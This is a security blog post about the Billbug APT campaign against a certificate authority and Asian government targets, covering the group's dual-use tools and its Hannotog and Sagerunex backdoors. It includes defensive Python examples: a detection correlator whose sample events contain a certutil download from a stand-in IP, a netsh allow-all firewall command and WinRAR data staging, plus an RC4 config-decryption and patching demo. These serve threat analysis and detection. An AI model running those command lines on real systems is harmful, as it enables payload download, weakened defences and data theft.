Heimdal
The threat actor called Billbug (a.k.a. Thrip, Lotus Blossom, Spring Dragon) is responsible for a campaign that targeted a certificate authority, government agencies, and defense organizations in multiple countries in Asia.

It is believed that the hacking group, which has been operating since 2009, is a state-sponsored group working for China.

Details about the Campaign

Symantec reports that the current campaign has been active since at least March 2022. Among the targets was a certificate authority company, and a compromise there could have made the group's activity considerably harder to detect.

The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines. It could also potentially use compromised certificates to intercept HTTPS traffic.


Although it is not clear how the advanced persistent threat (APT) group gained initial access, it appears to have exploited public-facing applications with known flaws.

Once inside, the group relied largely on built-in, dual-use and freely available tools, including the following:

  • AdFind
  • Winmail
  • WinRAR
  • Ping
  • Tracert
  • Route
  • NBTscan
  • Certutil
  • Port Scanner

In its attacks Billbug combines tools already present on the targeted system, free utilities, and custom malware. This mix makes the group's activity harder to spot, because most of it blends in with ordinary administrative work and raises few security alerts on its own.
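Because each of the tools listed above has legitimate uses, a single execution is weak evidence; the detection value lies in the cluster of dual-use tools appearing together on one host. The Python below is an added example, not code from the article or from Symantec's report: it matches constructed process-creation events against rules for certutil downloads, AdFind, NBTscan and WinRAR archiving, plus a netsh firewall-policy change standing in for the kind of firewall tampering described for Hannotog later on (the exact command Hannotog uses is not stated on the page and is an assumption here), and flags hosts where several distinct categories occur. The host names, paths, IP addresses and command lines are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample events (not real telemetry): (host, image path, command line).
SAMPLE_EVENTS = [
    ("WS01", r"C:\Windows\System32\certutil.exe",
     r"certutil -urlcache -split -f http://203.0.113.10/u.dat C:\Users\Public\u.dat"),
    ("WS01", r"C:\Users\Public\AdFind.exe", "AdFind.exe -f objectcategory=computer -csv"),
    ("WS01", r"C:\Users\Public\nbtscan.exe", "nbtscan -r 10.0.0.0/24"),
    ("WS01", r"C:\Program Files\WinRAR\WinRAR.exe",
     r"WinRAR.exe a -hpS3cret C:\Users\Public\d.rar C:\Users\alice\Documents"),
    # Assumed stand-in for "allow all traffic" firewall tampering; not Hannotog's actual command.
    ("WS01", r"C:\Windows\System32\netsh.exe",
     "netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound"),
    ("WS02", r"C:\Windows\System32\PING.EXE", "ping -n 1 dc01"),
    ("WS02", r"C:\Windows\System32\certutil.exe", "certutil -verify user.cer"),  # benign use
]

# Each rule: (category, regex on the image file name, regex on the command line).
# Requiring both keeps benign use of the same binary (certutil -verify) from matching.
RULES = [
    ("certutil_transfer", r"(?i)certutil\.exe$", r"(?i)\s-(urlcache|decode|encode)\b"),
    ("ad_enum", r"(?i)adfind\.exe$", r".*"),
    ("netbios_scan", r"(?i)nbtscan(\.exe)?$", r".*"),
    ("archive_staging", r"(?i)(winrar|rar)\.exe$", r"(?i)^\S+\s+[am]\s"),
    ("firewall_opened", r"(?i)netsh\.exe$",
     r"(?i)advfirewall\s+set\s.*(firewallpolicy\s+allowinbound|state\s+off)"),
]


def match_rules(image, cmdline):
    """Return the categories whose image-name and command-line patterns both match."""
    name = image.rsplit("\\", 1)[-1]
    return [cat for cat, img_re, cmd_re in RULES
            if re.search(img_re, name) and re.search(cmd_re, cmdline)]


def correlate(events, threshold=3):
    """Collect distinct categories per host and flag hosts at or above the threshold.

    One dual-use tool is noise; several different ones on the same host within the
    window of the events passed in is the living-off-the-land pattern worth an alert.
    """
    per_host = defaultdict(set)
    for host, image, cmdline in events:
        per_host[host].update(match_rules(image, cmdline))
    return {host: sorted(cats) for host, cats in per_host.items() if len(cats) >= threshold}


if __name__ == "__main__":
    for host, cats in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(cats)}")
```

In a real deployment the events would come from Sysmon event ID 1 or EDR process telemetry and the correlation window would be bounded in time; the threshold is a tuning knob, and the per-tool rules should be narrowed to the argument patterns that are abnormal for the environment rather than matching every execution.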

In recent operations, the threat actor also deployed an open-source tool called Stowaway. This Go-based multi-level proxy is designed to bypass network access filters.

Details about the Malware Used

Billbug has repeatedly used two custom backdoors, Hannotog and Sagerunex, which have changed only slightly over the past years.

The Hannotog backdoor tampers with the firewall settings so that all traffic is allowed. The malware can then persist on the compromised machine, upload encrypted data, execute CMD commands, and download files to the device.

Sagerunex is dropped by Hannotog and injects itself into an "explorer.exe" process. It then writes its logs to a local temp file encrypted with 256-bit AES.

The backdoor's configuration and state are also stored locally, encrypted with RC4; the keys for both the AES and RC4 encryption are hardcoded in the malware.
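A hardcoded key is good news for the analyst: RC4 is a symmetric stream cipher, so whoever pulls the key out of the binary can decrypt every configuration and state file the sample wrote, and can also rewrite those files without the key, since a stream cipher gives confidentiality but no integrity. The following Python is an added example, not code from the article or from Sagerunex itself; the key, the config layout and the "CFG1" header are hypothetical stand-ins for whatever the real malware uses.

```python
from typing import Iterable, Optional, Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR; the same call both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Hypothetical hardcoded key and a constructed config; neither is Sagerunex's real value.
HARDCODED_KEY = b"examplekey-not-real"
PLAINTEXT_CONFIG = b"CFG1|c2=https://203.0.113.20/api|proxy=10.0.0.5:8080|sleep=300"
ENCRYPTED_CONFIG = rc4(HARDCODED_KEY, PLAINTEXT_CONFIG)


def try_keys(blob: bytes, candidates: Iterable[bytes],
             magic: bytes = b"CFG1") -> Optional[Tuple[bytes, bytes]]:
    """Try candidate keys (e.g. strings carved from the binary) against an encrypted
    file and return the first one whose output starts with the expected header."""
    for key in candidates:
        plaintext = rc4(key, blob)
        if plaintext.startswith(magic):
            return key, plaintext
    return None


def patch_field(blob: bytes, offset: int, old: bytes, new: bytes) -> bytes:
    """Change a known plaintext field without the key: XOR the ciphertext bytes with
    (old ^ new). This works because RC4 output is plaintext XOR keystream, with no
    authentication tag to detect the change."""
    if len(old) != len(new):
        raise ValueError("replacement must keep the field length")
    patched = bytearray(blob)
    for k, (o, n) in enumerate(zip(old, new)):
        patched[offset + k] ^= o ^ n
    return bytes(patched)


if __name__ == "__main__":
    found = try_keys(ENCRYPTED_CONFIG, [b"wrong", b"alsowrong", HARDCODED_KEY])
    print("recovered:", found)
    off = PLAINTEXT_CONFIG.index(b"300")
    tampered = patch_field(ENCRYPTED_CONFIG, off, b"300", b"001")
    print("after patch:", rc4(HARDCODED_KEY, tampered))
```

The candidate-key search is how this usually plays out in practice: the key is one of a handful of constant strings or byte arrays in the sample, and the decrypted file's fixed header (or simply readable ASCII) confirms the right one. The patch function is the caveat for anyone who reads "encrypted with RC4" as "protected": without a MAC, the file can be altered byte-for-byte by anything that can write to it.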


Sagerunex connects to the C2 server over HTTPS, sending a list of active proxies and files and receiving payloads and shell commands from the operators. It can also use "runexe" and "rundll" to execute programs and DLLs.


Author Profile

Andreea Chebac

Digital Content Creator

Andreea is a digital content creator within Heimdal® with a great belief in the educational power of content. A literature-born cybersecurity enthusiast (through all those SF novels…), she loves to bring her NGO, cultural, and media background to this job.
